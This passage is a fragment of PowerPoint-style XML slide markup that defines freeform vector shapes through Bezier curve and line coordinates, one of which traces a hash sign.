                      <a:pt x="38" y="121"/>
                      <a:pt x="38" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="122"/>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69"/>
                      <a:pt x="69" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="175"/>
                      <a:pt x="67" y="176"/>
                      <a:pt x="64" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="178"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="64" y="181"/>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3" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="115" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="116" y="174"/>
                      <a:pt x="117" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="178"/>
                      <a:pt x="116" y="182"/>
                      <a:pt x="115" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="188"/>
                      <a:pt x="114" y="190"/>
                      <a:pt x="113"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5" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="141" y="138"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="137"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="135" y="97"/>
                      <a:pt x="126" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="97"/>
                      <a:pt x="134" y="103"/>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2" y="103"/>
                      <a:pt x="121" y="98"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="107" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="70"/>
                      <a:pt x="105" y="67"/>
                      <a:pt x="105"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7"/>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7" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="86" y="40"/>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6" y="33"/>
                      <a:pt x="65" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="69" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="48"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="42"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="74"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0" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="86" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="63"/>
                      <a:pt x="91" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="69"/>
                      <a:pt x="78"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1" y="43"/>
                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>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Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4077" y="224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Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4089" y="2249"/>
                <a:ext cx="4" cy="1"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3"/>
                  <a:gd name="T1" fmla="*/ 0 h 1"/>
                  <a:gd name="T2" fmla="*/ 3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1"/>
                      <a:pt x="3"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Freeform 54"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="20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Freeform 55"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="222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Freeform 56"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="242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Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2620"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Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2770"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Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2918"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4"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Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="311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Freeform 61"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="326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Freeform 62"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="345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Freeform 63"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3656"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Freeform 64"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3805" y="2929"/>
                <a:ext cx="155" cy="248"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 127"/>
                  <a:gd name="T1" fmla="*/ 100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Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3989" y="2933"/>
                <a:ext cx="189" cy="218"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 218"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 218"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 218"/>
                  <a:gd name="T6" fmla="*/ 132 w 189"/>
                  <a:gd name="T7" fmla="*/ 134 h 218"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 134 h 218"/>
                  <a:gd name="T10" fmla="*/ 173 w 189"/>
                  <a:gd name="T11" fmla="*/ 152 h 218"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 152 h 218"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 218 h 218"/>
                  <a:gd name="T16" fmla="*/ 93 w 189"/>
                  <a:gd name="T17" fmla="*/ 218 h 218"/>
                  <a:gd name="T18" fmla="*/ 106 w 189"/>
                  <a:gd name="T19" fmla="*/ 152 h 218"/>
                  <a:gd name="T20" fmla="*/ 65 w 189"/>
                  <a:gd name="T21" fmla="*/ 152 h 218"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 218 h 218"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 218 h 218"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 152 h 218"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 152 h 218"/>
                  <a:gd name="T30" fmla="*/ 4 w 189"/>
                  <a:gd name="T31" fmla="*/ 134 h 218"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 134 h 218"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 218"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 218"/>
                  <a:gd name="T38" fmla="*/ 16 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 218"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 218"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 218"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 218"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 218"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 218"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 218"/>
                  <a:gd name="T52" fmla="*/ 160 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 218"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 218"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 218"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 218"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 218"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 134 h 218"/>
                  <a:gd name="T64" fmla="*/ 111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7"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111"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Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4207" y="2929"/>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2"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Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4402" y="2929"/>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Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4600" y="292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Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="474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Freeform 70"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4942"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Freeform 71"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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72"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="533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Freeform 73"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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74"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5680" y="292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5"/>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Freeform 75"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5830" y="292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Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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3"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Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="617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Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="632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Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="651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Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6944"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Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7092"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Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="728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Freeform 83"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="748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Freeform 84"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="76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Freeform 85"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6712" y="2920"/>
                <a:ext cx="218" cy="256"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 176 w 179"/>
                  <a:gd name="T1" fmla="*/ 173 h 209"/>
                  <a:gd name="T2" fmla="*/ 135 w 179"/>
                  <a:gd name="T3" fmla="*/ 208 h 209"/>
                  <a:gd name="T4" fmla="*/ 81 w 179"/>
                  <a:gd name="T5" fmla="*/ 198 h 209"/>
                  <a:gd name="T6" fmla="*/ 33 w 179"/>
                  <a:gd name="T7" fmla="*/ 201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7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3 h 209"/>
                  <a:gd name="T40" fmla="*/ 161 w 179"/>
                  <a:gd name="T41" fmla="*/ 152 h 209"/>
                  <a:gd name="T42" fmla="*/ 89 w 179"/>
                  <a:gd name="T43" fmla="*/ 71 h 209"/>
                  <a:gd name="T44" fmla="*/ 102 w 179"/>
                  <a:gd name="T45" fmla="*/ 67 h 209"/>
                  <a:gd name="T46" fmla="*/ 74 w 179"/>
                  <a:gd name="T47" fmla="*/ 79 h 209"/>
                  <a:gd name="T48" fmla="*/ 64 w 179"/>
                  <a:gd name="T49" fmla="*/ 76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5 h 209"/>
                  <a:gd name="T68" fmla="*/ 120 w 179"/>
                  <a:gd name="T69" fmla="*/ 171 h 209"/>
                  <a:gd name="T70" fmla="*/ 127 w 179"/>
                  <a:gd name="T71" fmla="*/ 145 h 209"/>
                  <a:gd name="T72" fmla="*/ 127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1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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="179"/>
                      <a:pt x="176" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="185"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="149" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="207"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="135" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="208"/>
                      <a:pt x="128" y="208"/>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3"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="49" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>
                      <a:pt x="38" y="203"/>
                      <a:pt x="33" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="200"/>
                      <a:pt x="19" y="198"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="196"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="193"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="186"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="3" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="4" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="3" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="8" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="159"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="23" y="154"/>
                      <a:pt x="23" y="149"/>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3"/>
                      <a:pt x="5" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="170"/>
                      <a:pt x="7" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="176"/>
                      <a:pt x="9" y="179"/>
                      <a:pt x="7" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="184"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="5" y="191"/>
                      <a:pt x="7" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="193"/>
                      <a:pt x="11" y="193"/>
                      <a:pt x="14" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="196"/>
                      <a:pt x="35" y="198"/>
                      <a:pt x="46" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="203"/>
                      <a:pt x="52" y="203"/>
                      <a:pt x="56" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="202"/>
                      <a:pt x="66" y="197"/>
                      <a:pt x="65" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="185"/>
                      <a:pt x="63" y="182"/>
                      <a:pt x="61" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="169"/>
                      <a:pt x="49" y="160"/>
                      <a:pt x="43" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="38" y="147"/>
                      <a:pt x="35" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="142"/>
                      <a:pt x="30" y="142"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="26" y="144"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="140"/>
                      <a:pt x="25" y="136"/>
                      <a:pt x="26" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="27" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="124"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="40" y="99"/>
                      <a:pt x="44" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="86"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>
                      <a:pt x="61" y="67"/>
                      <a:pt x="60" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="57"/>
                      <a:pt x="59" y="50"/>
                      <a:pt x="59" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="38"/>
                      <a:pt x="59" y="32"/>
                      <a:pt x="59" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="16"/>
                      <a:pt x="64" y="8"/>
                      <a:pt x="73" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="0"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="85" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="0"/>
                      <a:pt x="97" y="1"/>
                      <a:pt x="103" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="6"/>
